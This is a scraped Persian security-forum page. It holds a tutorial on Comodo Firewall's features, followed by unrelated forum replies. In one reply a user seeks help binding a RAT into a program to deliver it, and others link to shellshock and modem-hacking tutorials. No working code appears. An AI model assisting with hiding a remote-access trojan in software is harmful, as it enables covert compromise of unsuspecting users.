ما نشان میدهد . اولین بخش در این سربرگ ، Firewall است . در این بخش اطلاعاتی در مورد فایروال وجود دارد . تعداد کانکشن های ورودی یا خروجی و همچنین برنامه هایی که با اینترنت ارتباط دارند . تصویری که در زیر مشاهده میکنید ، شماره گذاری شده است و طبق شماره ها به بررسی این قسمت ها میپردازیم . 1- در این بخش تعداد دسترسی های بلاک شده به اینترنت نمایش داده میشود . اگر روی عددی که به صورت لینک است کلیک کنید ، برنامه ای که دسترسی اش به اینترنت بلاک شده است ، نمایش داده خواهد شد . 2- در این قسمت شما میتوانید تعداد کانکشن های ورودی و خروجی سیستم را مشاهده کنید . 3- در اینجا نام برنامه های در ارتباط با اینترنت و سهم استفاده ی هر کدام بر حسب درصد نمایش داده شده است . به عنوان مثال میبینید که برنامه هایی مثل کروم و همچنین آنتی ویروس آوست با اینترنت ارتباط دارند و در حال تبادل اطلاعات هستند . همچنین اگر روی نام هر برنامه کلیک کنید ، میتوانید کانکشن های ایجاد شده و میزان دانلود و آپلود توسط آن برنامه را مشاهده کنید . این قسمت میتواند بسیار مفید واقع شود . اگر یک بدافزار در حال استفاده از اینترنت برای ارسال اطلاعات به مقصد مورد نظر هکر باشد ، شما میتوانید به راحتی متوجه شده و دسترسی آن را به اینترنت قطع کنید . 4- با کلیک بروی این آیتم میتوانید دسترسی همه برنامه ها به اینترنت را متوقف کنید . پس از کلیک بروی گزینه Stop All Traffic ، نام آن به Restore All Traffic تغییر میکند و با کلیک بروی آن میتوانید دوباره دسترسی برنامه ها به اینترنت را برقرار کنید . 5- این گزینه میتواند به شخصی سازی بیشتر فایروال توسط شما کمک کند . البته وظیفه نمایش سطح امنیتی فایروال را نیز بر عهده دارد . در حالت پیشفرض این گزینه روی Safe Mode قرار دارد . اما شما میتواند با کلیک بروی این گزینه ، انتخاب های بیشتری را بدست بیاورید . مثلا هر نوع ارسال و دریافت اطلاعات ( خروجی یا ورودی ) را مسدود کرده و یا به کلی فایروال را از کار بیندازید . البته گزینه های دیگری نیز وجود دارند که بسته به نیاز شما میتوانند به کار بروند . بخش دوم در سربرگ Summary ، بخش +Defense میباشد . +Defense بیشتر فعالیت خود را روی فایل های شما متمرکز میکند . به عنوان مثال فایل هایی که شما بلاک کرده اید در این قسمت نمایش داده میشوند . 1- تعداد فایل هایی که توسط بخش +Defense بلاک شده اند را میتوانید مشاهده کنید . 2- در این قسمت فایل هایی را که خودتان به عنوان فایل های مشکوک به Comodo معرفی کرده اید ، قرار میگیرند . 3- فناوری Sandbox در این نرم افزار وجود دارد و شما میتوانید برنامه هایی که به سالم بودن آنها شک دارید را در سندباکس اجرا کنید تا از تاثیرات منفی احتمالی آنها بروی سیستم خود جلوگیری به عمل آورید . در این قسمت نیز تعداد برنامه هایی که در حال حاضر در سندباکس اجرا شده اند را میتوانید مشاهده کنید . 4- این بخش هم مانند قسمت قبلی است و میتوانید شخصی سازی بیشتری در قسمت +Defense بوجود بیاورید . این قسمت در واقع سطح امنیتی بخش +Defense را نمایش میدهد . ******************* سربرگ بعدی Firewall است . در این قسمت میتوانید بخش هایی که به فایروال کومودو مربوط میشود را تغییر دهید . از سمت چپ شروع میکنیم . 1- View Firewall Events : در این قسمت میتوانید گزارشات مربوط به فایروال کومودو را مشاهده کنید . به عنوان مثال همه دسترسی هایی که توسط فایروال مسدود شده اند و یا تغییر در تنظیمات فایروال . همه و همه در این قسمت جمع آوری میشوند و شما با مطالعه ی آنها میتوانید اطلاعات زیادی را بدست بیاورید و اگر دسترسی برنامه ای به اینترنت به اشتباه مسدود شده است ، آن را تغییر دهید . اطلاعات تکمیلی که از پنجره Firewall Events بدست می آید مانند نام برنامه ، اقدامی که در برابر آن انجام شده است ، پروتکل ، آی.پی مبدا و مقصد ، پورت مبدا و مقصد و تاریخ مربوط به آن گزارش میباشد . 2- Define a New Trusted Application : ظاهرا عنوان این قسمت گویای همه چیز است . در اینجا شما میتواند برنامه هایی را که به آنها اطمینان کامل دارید ، به فایروال کومودو معرفی کنید . پس از این هر درخواستی که از سوی آن برنامه ( یا برنامه ها ) به فایروال کومودو برسد ، به صورت اتوماتیک موافقت میشود . میتوانید برنامه ی مورد نظر خود را از بین گروه های نرم افزاری انتخاب کنید . مثل برنامه هایی که مسئول آپدیت کردن ویندوز هستند . یا اینکه از بین پردازش های در حال اجرا ، برنامه مورد نظر خود را انتخاب کنید . اگر هیچکدام از این موارد به کار شما نیامد ، میتوانید به صورت مستقیم فایل اجرایی برنامه ی مورد نظرتان را از روی هارددیسک سیستم انتخاب کنید . 3- Define a New Blocked Application : این قسمت دقیقا عکس قسمت بالا عمل میکند . هر برنامه ای را که در این بخش معرفی کنید ، به صورت اتوماتیک درخواست های اتصالش به شبکه یا اینترنت ، مسدود میشود . این قسمت در مواقعی که یک بدافزار را روی سیستم تان شناسایی کرده و قصد دارید ارتباطش را با شبکه و اینترنت قطع کنید ، بسیار کارآمد است . روش معرفی برنامه ها هم مانند قسمت بالاست . 4- Network Security Policy : این قسمت را میتوان حساس ترین قسمت فایروال دانست . چون همه سیاست ها و تدابیر امنیتی که فایروال توسط آنها با برنامه ها برخورد لازم را میکند ، در این بخش قرار دارند . این قسمت مخصوص کاربران حرفه ای است . پس اگر زیاد با تنظیمات مربوط به شبکه آشنا نیستید ، از این بخش عبور کنید و تغییری در آن بوجود نیاورید . چون ممکن است برایتان دردسر ساز شود . پس از انتخاب این آیتم با پنجره ای حاوی شش سربرگ روبرو خواهید شد . در ادامه به معرفی مختصر این قسمت ها میپردازیم . سربرگ Application Rules : در این سربرگ میتوانید سیاست های امنیتی که اغلب توسط خودتان و برای برنامه ها تعیین شده اند را مشاهده و مدیریت کنید . مثل برنامه هایی که دسترسی شان به اینترنت یا شبکه تایید یا رد شد است . اگر به اشتباه دسترسی برنامه ای را به شبکه و اینترنت مسدود کرده باشید ، میتوانید از این قسمت مشکل را حل کنید . سربرگ Global Rules : برخلاف قسمت Applications Rules که تنها سیاست های مورد نظر شما را روی برنامه ها اعمال میکرد ، این قسمت کل ارتباطات شما با شبکه و اینترنت را در بر میگیرد . شما میتوانید در این بخش سیاست هایی را تعریف کنید تا بر کل ارتباطات اعمال شوند . سربرگ Predefined Policies : در این قسمت سیاست های از پیش تعریف شده ی فایروال قرار دارند . مثل سیاست هایی که برای مرورگرها ، برنامه های مدیریت ایمیل ، کلاینت های FTP ، برنامه های قابل اعتماد ، برنامه های مسدود شده و خروجی ها در نظر گرفته میشوند . سربرگ Network Zones : در این بخش شما میتوانید مناطق شبکه ای را تعریف کنید و سطوح دسترسی متفاوتی را روی آنها اعمال کنید . یک منطقه ی شبکه ای میتواند شامل یک کامپیوتر خانگی متصل به اینترنت و یا هزاران کامپیوتر دیگر باشد . سربرگ Blocked Zones : همانطور که از نام این بخش پیداست ، میتوانید مناطقی از شبکه که مورد نظرتان هست را مسدود کنید . سربرگ Port Sets : در این بخش میتوانید پورت ها را مدیریت کنید . در این قسمت پورت های از پیش تعریف شده ای وجود دارند . البته شما هم میتوانید پورت های جدیدی به منظور استفاده توسط برنامه های دیگر ایجاد کنید . 5- View Active Connections : با کلیک بروی این آیتم پنجره ی Active Connections باز میشود . در این پنجره کانکشن های فعال نمایش داده میشوند . هر برنامه ممکن است یک یا چند کانکشن ایجاد کند که همه ی آنها را میتوانید به یکباره اینجا ببینید . علاوه بر این اطلاعات دیگری مثل پروتکل ، آی.پی و پورت مبدا و مقصد و همچنین ترافیک ورودی و خروجی نیز به شما نمایش داده میشود . 6- Stealth Port Wizard : هکرها ابزاری به نام پورت اسکنر دارند . این ابزار به هکرها کمک میکند تا پورت های باز روی یکی سیستم را شناسایی کرده و با نوشتن یک بدافزار بتوانند از طریق آن به سیستم نفود کنند . قابلیتی که توسط کومودو در اختیار شما قرار گرفته است باعث میشود تا پورت های سیستم شما از دید برنامه های پورت اسکنر ، پنهان بمانند . البته با استفاده از این قابلیت هیچ خللی در ارتباط شما با اینترنت بوجود نخواهد آمد . کومودو این قابلیت را با سه روش به شما ارائه میدهد : Define a new trusted network and make my ports stealth for everyone else : اگر این گزینه را انتخاب کنید ، کامپیوتر شما از دید همه به جز شبکه هایی که به عنوان قابل اعتماد معرفی کرده اید ، پنهان خواهد شد . Alert me to incoming connections and make my ports stealth on a per-case basis : در صورتی که از این گزینه استفاده کنید ، هرگاه درخواستی برای اتصال به کامپیوتر شما داده شود ، فایروال یک هشدار به شما خواهد داد و از شما برای تایید یا رد این درخواست سوال میکند . این قسمت برای استفاده از شبکه های نظیر به نظیر ( Peer to Peer ) و یا Remote Desktop Connection که نیاز به رویت پورت دارند ، مفید است . Block all incoming connections and make my ports stealth for everyone : در صورت انتخاب این گزینه ، تمام پورت های سیستم از دید تمام شبکه ها پنهان خواهد شد . فایروال نیز هرگونه در خواست اتصال ورودی را مسدود میکند . 7- Firewall Behavior Settings : در این قسمت میتوانید تنظیمات مربوط به فایروال را تغییر دهید . به عنوان مثال میتوانید میزان هشدارهای فایروال را کاهش یا افزایش دهید . پس از کلیک بروی این آیتم با پنجره ی Firewall Behavior Settings روبرو خواهید شد که دارای سه سربرگ است . سربرگ General Settings : در این سربرگ تنظیمات اصلی فایروال قابل مشاهده و تغییر است . تنظیم سطح امنیتی فایروال مهترین تنظیمی است که میتوانید در این سربرگ انجام دهید . سربرگ Alert Settings : همانطور که از نام این سربرگ پیداست ، تنظیمات مربوط به هشدارهای فایروال در اینجا قرار دارند . شما میتوانید با استفاده از نواری لغزنده ای که در این سربرگ قرار دارد ، میزان هشدارها را از خیلی کم به خیلی زیاد تغییر دهید . اگر آدم کم حوصله ای هستید ، میتوانید نشانگر را بروی Very Low قرار دهید . اما اگر دوست دارید همه چیز تحت کنترل تان باشد ، میتوانید لغزنده را به سمت بالا ببرید . سربرگ Advanced : تنظیماتی که در این قسمت قرار دارند به منظور محافظت هرچه بهتر شما در مقابل حملات DOS میباشند . ********************** سومین بخش اصلی از این نرم افزار ، سربرگ +Defense است . بیشتر کار این بخش مربوط به نظارت بر فایل هاست . باز هم از سمت چپ شروع کرده و توضیح مختصری در مورد هر آیتم خواهیم داد . 1- View Defense+ Events : اگر یادتان باشد در قسمت فایروال هم آیتمی مشابه همین مورد وجود داشت که کارش نمایش رخدادها و گزارشات مربوط به فایروال بود . این قسمت هم دقیقا مانند همان است . با این تفاوت که در اینجا رخدادها و گزارشات مربوط به قسمت +Defense را مشاهده خواهید کرد . اطلاعاتی که از این پنجره بدست می آیند شامل موارد مثل نام برنامه ها ، فعالیت های انجام شده توسط آنها ، فایل هدف و تاریخ ثبت آن فعالیت است . 2- Trusted Files : فکر کنم نام این بخش گویای کارایی اش باشد . در این قسمت میتوانید فایل های قابل اطمینان خود را به کومودو معرفی کنید . در صورتی که فایلی را به این لیست اضافه کنید ، کومودو آن را به عنوان Trusted یا قابل اطمینان علامتگذاری کرده و از آن به بعد در مورد دسترسی ها آن فایل به قسمت های مختلف از شما سوالی نخواهد پرسید . این قسمت میتواند برای برنامه نویسان بسیار مفید واقع شود . چون در هنگام تست برنامه ی خود احتمالا کومودو از آنها به صورت مداوم در مورد دسترسی برنامه هایشان سوال خواهد کرد . در صورتی که فایل اجرایی برنامه خود را به این لیست اضافه کنند ، میتوانند از شر این سوالات خلاص شوند . البته اگر به اشتباه برنامه ای را به لیست اضافه کردید ، میتوانید آن را حذف کنید . 3- Unrecognized Files : اگر فایلی به نظرتان مشکوک میرسد ، حتما آن را به این بخش اضافه کنید . البته سیستم +Defense کومودو بعضی فایل ها را به این قسمت اضافه میکند . فایل هایی که به این لیست اضافه میشوند ، تا موقعی که شما آن ها را به عنوان فایل قابل اطمینان معرفی نکنید ، در Sandbox کومودو اجرا میشود تا از تاثیرات منفی احتمالی آن بروی سیستم جلوگیری شود . شما میتوانید فایل های مورد نظرتان را از طریق همین پنجره به منظور تحلیل بیشتر برای کومودو ارسال کنید . اینکار از طریق دکمه Submit قابل انجام است . 4- Computer Security Policy : اینجا مهمترین بخش و شاید بتوان گفت قلب سیستم +Defense کودمو میباشد . در این بخش میتوانید سیاست هایی که +Defense روی برنامه ها و سایر بخش های سیستم اعمال میکند را مشاهده کرده و مطابق نیازهای خود تغییر دهید . این قسمت شامل هشت سربرگ است که به صورت مختصر به هر کدام اشاره ای خواهیم داشت . سربرگ Defense+ Rules : در این سربرگ میتوانید به سیاست هایی که بروی برنامه های لیست شده اعمال میشود دسترسی داشته و در صورت نیاز آنها را تغییر دهید . همچنین میتواند خودتان سیاست جدید تعریف کنید و بروی برنامه های مورد نظرتان اعمال کنید . سربرگ Predefined Policies : در این قسمت هم سیاست های از پیش تعریف شده ی +Defense قرار دارند که بروی قسمت هایی مثل “برنامه های قابل اطمینان ” ، “برنامه های سیستمی ویندوز” ، “برنامه های ایزوله شده” و “برنامه های محدود شده” اعمال میشوند . البته خودتان نیز توانایی ایجاد ، تغییر و حذف سیاست ها را دارید . سربرگ Always Sandbox : در طی این مطلب چندین بار به عبارت Sandbox اشاره کردیم . کلا Sandbox یا جعبه شنی به سیستمی گفته میشود که میتواند از بروز تاثیرات مخرب نرم افزارها بروی کامپیوتر جلوگیری کند . وقتی برنامه ای در سندباکس اجرا میشود ، حق دسترسی های کمی به آن تعلق گرفته و نمیتواند تغییری در تنظیمات سیستم عامل ، رجیستری و سایر قسمت های حیاتی سیستم بوجود بیاورد . با توجه به این موارد بهتر است برنامه هایی که به آنها اعتماد ندارید را در سندباکس اجرا کرده و جلوی رخ دادن هرگونه اتفاق ناگواری برای کامپیوترتان را بگیرید . به عنوان مثال میتوانید برنامه هایی که در حالت بتا قرار دارند را به این بخش اضافه کنید . لازم به ذکر است که شما باید برنامه هایی را به این قسمت اضافه کنید که قصد دارید در طولانی مدت از آنها در حالت سندباکس استفاده کنید . اما اگر میخواهید تنها برنامه های مورد نظرتان برای یک بار در سندباکس اجرا شوند ، ادامه مطلب را نیز مطالعه کنید . سربرگ Blocked Files : فکر نکنم نیازی باشد توضیح اضافه ای در مورد این قسمت و کارایی آن بدهیم . هر فایلی را به این قسمت اضافه کنید ، به طور کامل همه دسترسی های آن مسدود خواهد شد و عملا ویندوز نمیتواند آن را اجرا کند . سربرگ Protected Files and Folder : یکی از بهترین بخش های کومودو که به شخصه علاقه زیادی به آن دارم همین بخش است . مسلما همه ما فایل های مهمی داریم . اگر دانشجو باشید ، فایل های مربوط به تحقیق ها و پروژه هایتان از اهمیت بسیار زیادی برخوردارند و به هیچ وجه دوست نخواهید داشت که توسط بدافزارها آلوده شده و آسیب ببینند . شما میتوانید فایل ها و فولدرهای مهم خود را به این بخش اضافه کرده و از تغییرشان توسط بدافزارها جلوگیری کنید . کومودو به صورت اتوماتیک فایل های مهم ویندوز و همچنین فایل های خودش را به این بخش اضافه میکند . البته یادتان نرود که فایل های اصلی مربوط به آنتی ویروس خود را نیز به این قسمت اضافه کنید تا در صورت تهاجم بدافزارها آسیب ندیده و از کار نیفتند . گرچه خود آنتی ویروس ها هم از پردازش ها و فایل های خود محافظت میکنند ، اما کار از محکم کاری عیب نمیکند . سربرگ Protected Registry Keys : کاربرد این قسمت هم شبیه قسمت قبلی است . با این تفاوت که اینجا هدف کومودو حفاظت از کلیدهای رجیستری میباشد . در این بخش کلیدهای مهم رجیستری گردآوری شده اند و محافظت میشوند . شما هم اگر کلیدی از رجیستری را مد نظر دارید ، میتوانید به این بخش اضافه کنید تا محافظت شوند . سربرگ Protected COM Interface : یک مدل برنامه نویسی شی گرای مایکروسافت Component Object Model یا همان COM میباشد که روش برقراری ارتباط بین اشیا در درون یک برنامه واحد یا بین برنامه های دیگر را تعریف میکند . COM به صورت پایه ای توسط Active X ها و OLE ها مورد استفاده قرار میگیرد . اکتیو ایکس ها و اُ.ال.ای ها دو هدف مورد علاقه ی هکرها و بدافزارها به منظور حمله به کامپیوتر شما هستند . یکی از اقدامات موثر در جهت حفظ امنیت سیستم ، محدود کردن دسترسی ها به COM میباشد . کمودو به صورت اتوماتیک از COM در برابر اصلاحات ، تخریب و نفوذ توسط بدافزارها محافظت میکند . در این بخش هم شما امکان اضافه ، تغییر و حذف موارد مورد نظرتان را خواهید داشت . سربرگ Trusted Software Vendors : در این قسمت نام فروشندگان معتبر نرم افزار وجود دارد . در صورتی که کاربر بخواهد برنامه ای را اجرا کرده و یا نصب کند ، نام فروشنده آن برنامه با این لیست مطابقت داده میشود و در صورتی که نام فروشنده در این لیست وجود داشته باشد ، آن برنامه به عنوان برنامه قابل اطمینان علامتگذاری شده و اجرا میشود . اما اگر نام فروشنده برنامه در این لیست وجود نداشته باشد ، در مورد دسترسی های برنامه ای که قصد اجرا شدن روی سیستم را دارد ، از کاربر سوال خواهد شد . مثل سایر قسمت ها ، در این بخش هم شما اجازه دارید که مواردی را اضافه یا حذف کنید . 5- View Process List : به زبان ساده میتوان گفت همان تسک منیجر ( Task Manager ) ویندوز است . البته با طبقه بندی بهتر و وجود چند ابزار مفید در جهت مسدود کردن و تحلیل پردازش ها . در این قسمت میتوانید تمامی پردازش هایی که در حال اجرا هستند را مشاهده کنید . با کلیک راست روی هر پردازش میتوانید آن را قطع کرده و یا هم قطع و هم مسدود کنید . این قسمت میتواند موقعی که فایل اصلی یک بدافزار فعال روی سیستم را شناسایی میکنید ، واقعا مفید باشد . همچنین میتوانید یک فایل را به منظور تحلیل بیشتر برای کومودو بفرستید . 6- Run a program in the sandbox : این قسمت مربوط به اجرای برنامه ها به صورت موقتی در سندباکس میباشد . قبلا در مورد سندباکس توضیح دادیم . میتوانید فایل اجرایی برنامه مورد نظر خود را از هارددیسک سیستم انتخاب کرده و درون سندباکس اجرا کنید . 7- Defense+ Settings : در این قسمت میتوانید تنظیمات مربوط به سیستم +Defense را انجام دهید . این بخش شامل چهار سربرگ است که به صورت مختصر به هر کدام اشاره ای خواهیم داشت . سربرگ General Settings : در این سربرگ میتوانید تنظیمات اصلی مربوط به سیستم +Defense را انجام دهید . اما مهمترین قسمت در این سربرگ ، بخشی تنظیم سطح امنیتی +Defense است که میتوانید با استفاده از نوار لغزنده آن را کاهش یا افزایش دهید . سربرگ Execution Control Settings : در این سربرگ هم میتوانید سیستم رهگیری فایل های اجرایی قبل از بارگذاری در حافظه را فعال یا غیر فعال کنید . کومودو Hash فایل اجرایی را محاسبه کرده و سپس آن را با لیست خود مقایسه میکند . اگر هش مطابقت داده شد ، آن برنامه امن است . اما اگر مطابقت حاصل نشد ، آن برنامه مشکوک بوده و به شما گزارش داده خواهد شد . سربرگ Sandbox Settings : در این سربرگ هم میتوانید به تنظیمات سندباکس بپردازید . به صورت پیشفرض قابلیت سندباکس غیر فعال است . اما با استفاده از نوار لغزنده میتواند آن را فعال کنید . سربرگ Monitoring Settings : در این سربرگ بخش های وجود دارند که شما میتوانید با فعال کردن آنها ، نظارت سیستم +Defense را بروی آنها اعمال کنید . ****************** سربرگ More نیز آخرین قسمت از این نرم افزار است که بیشتر شامل تنظیمات خود نرم افزار ( منظور تنظیمات امنیتی نیست ) ، مدیریت پیکربندی ، کمک رسانی ، عیب یابی و مواردی از این دست میباشد . باز هم از سمت چپ شروع میکنیم . 1- Preference : در این قسمت میتوانید تنظیمات مربوط به رابط کاربری ، تنظیمات بروزرسانی و محافظت از خود نرم افزار با استفاده از کلمات عبور را تغییر دهید . این قسمت هم شامل شش سربرگ میباشد . سربرگ General : در این سربرگ میتوانید تنظیماتی مثل آپدیت اتوماتیک برنامه ، پیام های اطلاع رسانی ، پیدا کردن شبکه های خصوصی به صورت اتوماتیک و … را انجام دهید . سربرگ Parental Control : اگر میخواهید از دسترسی کودکان به بخش های اصلی و تغییر دادنشان توسط آنها خودداری کنید ، میتوانید از قابلیت گذاشتن پسورد روی برنامه استفاده کنید . سربرگ Appearance : این قسمت بیشتر مربوط به رابط کاربری برنامه میشود و در آن میتوانید زبان و پوسته برنامه را تغییر دهید . سربرگ Logging : این بخش مخصوص تنظیمات گزارش گیری برنامه است . مثلا میتوانید گزارش گیری فایروال یا +Defense را غیر فعال کنید . سربرگ Connection : این بخش هم مخصوص تنظیمات پروکسی میباشد . سربرگ Update : و در نهایت از اینجا نیز میتوانید تنظیمات مربوط به آپدیت برنامه را انجام دهید . مثلا سرور آپدیت جدیدی اضافه کرده و یا حذف کنید . 2- Manage My Configurations : ممکن است مدیر شبکه باشید و بخواهید تنظیماتی را که تا به حال انجام داده اید را از این کامپیوتر به کامپیوترهای دیگر نیز منتقل کنید . این بخش به شما کمک شایانی در این امر خواهد کرد . میتوانید از تنظیمات یک خروجی گرفته و در کامپیوترهای دیگر وارد کنید . 3- Diagnostics : اگر فکر میکنید برنامه با مشکل مواجه شده است و به درستی کار نمیکند ، میتوانید از سیستم عیب یابی کومودو استفاده کنید . 4- Check For Update : در بیشتر برنامه ها چنین گزینه ای وجود دارد و عملکرد مشخصی نیز دارد . با کلیک بروی این آیتم و طی کردن یک مرحله ساده ، میتوانید دریابید که آپدیت جدیدی منتشر شده است یا نه . 5- Manage This Endpoint : این سرویس که به صورت تجاری میباشد ، سیستم کنترل از راه دوری برای برنامه های شما ( فایروال و یا آنتی ویروس کومودو ) از طریق یک رابط کاربری تحت وب فراهم میکند . به عنوان مثال اگر مدیر شبکه شرکت شما به مسافرت رفته باشد و مشکلی برای یکی از بخش های شبکه پیش بیاید و مربوط به تنظیمات آنتی ویروس یا فایروال کومودو باشد ، دیگر نیازی نیست منتظر بازگشت مدیر شبکه از سفر باشید . مدیر شبکه با استفاده از این قابلیت میتواند به سروری که تنظیمات در آن قرار دارد متصل شده و تغییرات مد نظرش را بوجود آورده و مشکل را رفع کنید . 6- Browse Support Forum : با انتخاب این آیتم به فروم کاربران کومودو خواهید رفت و میتوانید سوالات خود را مطرح کرده و جواب بگیرید . 7- Help : این قسمت هم که نامش کاملا بیانگر عملکردش میباشد . با انتخاب این آیتم نیز به بخش کمک رسانی کومودو ارجاع داده خواهید شد . 8- About : و نهایتا این قسمت که مربوط به مشخصات برنامه میباشد . از دیگر تنظیمات این برنامه میتوان به حالت Game Mode اشاره کرد . به عنوان مثال اگر در حال بازی باشید و کومودو پیغام هشداری نشان بدهد ، از بازی بیرون خواهید آمد و این به هیچ وجه خوشایند نیست . میتوانید با راست کلیک روی آیکون برنامه در System Tray ( کنار ساعت ویندوز ) و یا در نوار وظیفه ( Taskbar ) و انتخاب گزینه Game Mode مانع از پیغام دادن کومودو در هنگام بازی کردن شوید . یادتان باشد هنگامی که از بازی خارج شدید ، این گزینه را غیر فعال کنید تا متوجه پیغام های هشداری کومودو بشوید . سخن پایانی : در این مطلب سعی شد تا نگاهی به فایروال قدرتمند و رایگان شرکت Comodo داشته باشیم . سعی ما بر آن بوده تا بتوانیم هر قسمت را به صورت مختصر و مفید توضیح دهیم و شما را با عملکرد هر بخش آشنا کنیم . امید است که از مطالعه این مطلب استفاده برده باشید . لینک های دانلودراهنمای دانلودگزارش خرابی دانلود نسخه ی 32 بیتی - 89.4 مگابایت دانلود نسخه ی 64 بیتی - 97.5 مگابایت
  41. 1 امتیاز
    ان هم تصویر پورتی ک باز کردم
  42. 1 امتیاز
    سلام خسته نباشید. من همه مراحل رو انجام دادم پورت رو هم چک کردم ک باز هست یا نه موقع ساخت فایل با همچین خطایی مواجع میشم. از قسمت build+bind استفاده کردم و در اینجا از build ولی فایل رو پیدا نمیکنم یک بار با فعال بودن گزینه هیدن انجام دادم یکبار غیر فعالش کردم ولی فایل ساخته شده رو پیدا نکردم چیکاری با ید انجام بدم.میخوام رات رو توی یه برنامه بفرستم ممنون
  43. 1 امتیاز
    سلام درود اگه امکان داره تصویری از پورتی که روی مودم باز کردینو بفرستین تا مشکل شما روشن تر بشه بعدشم از یه پورتی استفاده کنین که تو سیستمون استفاده نکرده باشین.
  44. 1 امتیاز
    باید یک جایی اشتباه کرده باشید اگه حل نشد با من تماس بگیرید تا بیام براتون حل کنم
  45. 1 امتیاز
    من هم همین مشکل رو دارم دوستان لطفا راهنمایی کنید
  46. 1 امتیاز
    سلام. اگه میشه در مورد این حرف آخرتون یکم توضیح بدین منظورتون هک isp هستش؟
  47. 1 امتیاز
    a.a.a

    help joomla

    با چه ابزاری و نحوه اون چجوریه
  48. 1 امتیاز
    با سلام خدمت دوست عزیز خب دوستان تا حدی توضیح دادن گفتم ما هم توضیحاتی بدیم: ببینید باگ ها در زمینه های مختلف هکینگ باهم فرق می کنن برای مثال شما الان حدودا باگ های وب هکینگ رو نام بردید در این زمینه وب هکینگ من پیشنهاد می کنم حتما shellshock رو یاد بگیرید که اقای رکس اموزشات خوبی در این زمینه دادند: http://guardiran.org/forums/topic/512-%D8%AA%D8%A7%D9%BE%DB%8C%DA%A9-%D8%AC%D8%A7%D9%85%D8%B9-%D9%86%D9%81%D9%88%D8%B0-%D8%A7%D8%B2-%D8%B7%D8%B1%DB%8C%D9%82-%D8%A8%D8%A7%DA%AF-shellshock/#entry1249 درزمینه مودم های ADSL بنده باگ zynos زو پشنهاد می کنم حتما یادبگیرید: http://guardiran.org/forums/topic/1220-%D9%87%DA%A9-%D9%85%D9%88%D8%AF%D9%85-%D8%A8%D8%A7-%D8%A8%D8%A7%DA%AF-zynos-%D9%88-%D9%86%D8%AD%D9%88%D9%87-%D8%AF%DB%8C%D8%A8%D8%A7%DA%AF-%DA%A9%D8%B1%D8%AF%D9%86-%D8%A2%D9%86/ باتشکر و یا علی
  49. 1 امتیاز
    بخدا اولین فروم امنیتی می بینم کسی نیست جوابتو بده حرفهای منطقیو اسپم می دونن مدیریت کل سایتو هم خواستم بهش پیام خصوصی بدم صندوق پیامش پره برای rexنوشتم اونهم که اصلا جواب نداد اون مدیر کلم که نیست جواب نمیده اینجا چه خبره؟ کسی نیست جواب بده؟
  50. 1 امتیاز
    سلامی دوباره.... دوستان کم کم باید این تاپیک جمع و جور شه و بریم سراغ شل کد نویسی این آموزشی که قرار دادم کاربرد زیادی داره در شل کد نویسی ( Shell Programming برنامه نویسی شل ) نه تنها این , بلکه بقیه هم همینطوراین آموزش رو از دست ندید... اگر برنامه نویسی شل رو میخواهین خوب یاد بگیرین آموزشهای من رو ببنید و با من پیش همراه باشین تا از مبتدی خودتونو بالا بیارین . dastorat 2.rar پسورد : guardiran.org